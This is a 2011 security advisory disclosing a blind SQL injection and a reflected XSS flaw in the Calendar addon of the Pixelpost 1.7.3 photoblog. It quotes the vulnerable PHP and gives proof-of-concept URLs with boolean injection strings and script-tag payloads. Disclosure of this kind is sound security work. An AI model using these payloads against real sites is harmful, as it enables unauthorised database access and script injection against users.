ush.it - a beautiful place

Simone "negator" Onofri found multiple issues in a nice image gallery script that was going to use for his personal purposes, perhaps it's better to wait a couple of releases before using this in production. Since the vendor was not responsive this is a forced release. Found vulnerabilities include Blind SQL Injection and XSS.

Pixelpost (Calendar addon 1.1.6) 1.7.3 Multiple vulnerabilities

 Name              Pixelpost (Calendar 1.1.6) 1.7.3 Multiple vulnerabilities
 Systems Affected  Pixelpost v1.7.3
 Severity          High
 Impact            High 10/10, vector (AV:N/AC:L/Au:N/C:C/I:C/A:C)
 Vendor            http://www.pixelpost.org/
 Advisory          http://www.ush.it/team/negator/hack-pixelpost_173/adv.txt
 Author            Simone "negator" Onofri
 Date              20110407

I. BACKGROUND

Pixelpost is an open-source, standards-compliant, multi-lingual, fully
extensible photoblog application for the web.

II. DESCRIPTION

Pixelpost "Calendar", a pretty looking image gallery written in PHP, is
vulnerable to Blind SQL Injection and XSS.

III. ANALYSIS

Summary:
       A) Blind SQL Injection (SQLI) Vulnerability
       B) Reflected Cross Site Scirpting (XSS) Vulnerability

A) Blind SQL Injection (SQLI) Vulnerability

A blind SQL Injection vulnerability exists in Pixelpost version 1.7.3.

The calendar functionality must be enabled, it's an addon distributed
with the package but disabled by default.

The GET variable "category" inserted into a SELECT query without
sanitization and/or cast to an integer type on "addon/calendar.php":

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$query2 = mysql_query("SELECT a.* FROM ".$pixelpost_db_prefix."pixelpost
a, ".$pixelpost_db_prefix."catassoc b WHERE b.cat_id = '" .
$_GET["category"] . "' AND a.id = b.image_id AND (a.datetime like
'$prev_browsing_month_day%') ORDER BY a.datetime desc limit 1");

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

It's possible to exploit the issue in the standard blind way, for
example using TRUE/FALSE statements (tautology based bisection).

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

http://www.example.com/pixelpost/index.php?curr_month=4&curr_year=2011&showimage=3&category=10'+AND+'1'='1

http://www.example.com/pixelpost/index.php?curr_month=4&curr_year=2011&showimage=3&category=10'+AND+'1'='0

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

B) Reflected Cross Site Scripting (XSS) Vulnerability

A Reflected Cross Site Scripting vulnerability exists in Pixelpost
version 1.7.3 in the shipped by default but disabled calendar addon.

The GET variables "curr_year" and "category" are reflected in page
without proper encoding on "addon/calendar.php":

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$cal_vz .= "
<table class='table-calendar-vz' cellspacing='0'>
<tr>
<td class='td-calendar-navi-vz'><a href='$PHP_SELF?curr_month=$prev_mont
h&curr_year=$prev_year&showimage=$prev_image_id$geos_cat_id'>&la
quo;</a></td>
<td colspan='5' class='td-calendar-navi-vz'>
       $asc_mon-$curr_year
</td>
<td class='td-calendar-navi-vz'><a href='$PHP_SELF?curr_month=$next_mont
h&curr_year=$next_year&showimage=$next_image_id$geos_cat_id'>&ra
quo;</a></td>
</tr>
<tr>";

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PoC URL that exploits this vulnerability:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

http://www.example.com/pixelpost/index.php?curr_month=4&curr_year=2011'>
<script>alert('XSS')</script>&showimage=3&category=1'><script>alert('XSS
2')</script>

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

We did not investigate issues that may occour with globals on.

IV. DETECTION

Pixelpost 1.7.3 and possibly earlier versions are vulnerable.

V. WORKAROUND

No fix available.

VI. VENDOR RESPONSE

No Vendor response.

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20110309 Bug discovered
20110309 Vendor contacted
20110321 Advisory release scheduled for 20110407
20110407 Advisory released

IX. REFERENCES

Well you know what a SQLi or XSS is, right?

X. CREDIT

Simone "negator" Onofri is credited for the discovery of this
vulnerability.

Thanks to Francesco "ascii" Ongaro for revision and fine editing.

Simone "negator" Onofri
web site: http://simone.onofri.net/
mail: simone AT onofri DOT net

Francesco "ascii" Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it

XI. LEGAL NOTICES

Copyright (c) 2011 Francesco "ascii" Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.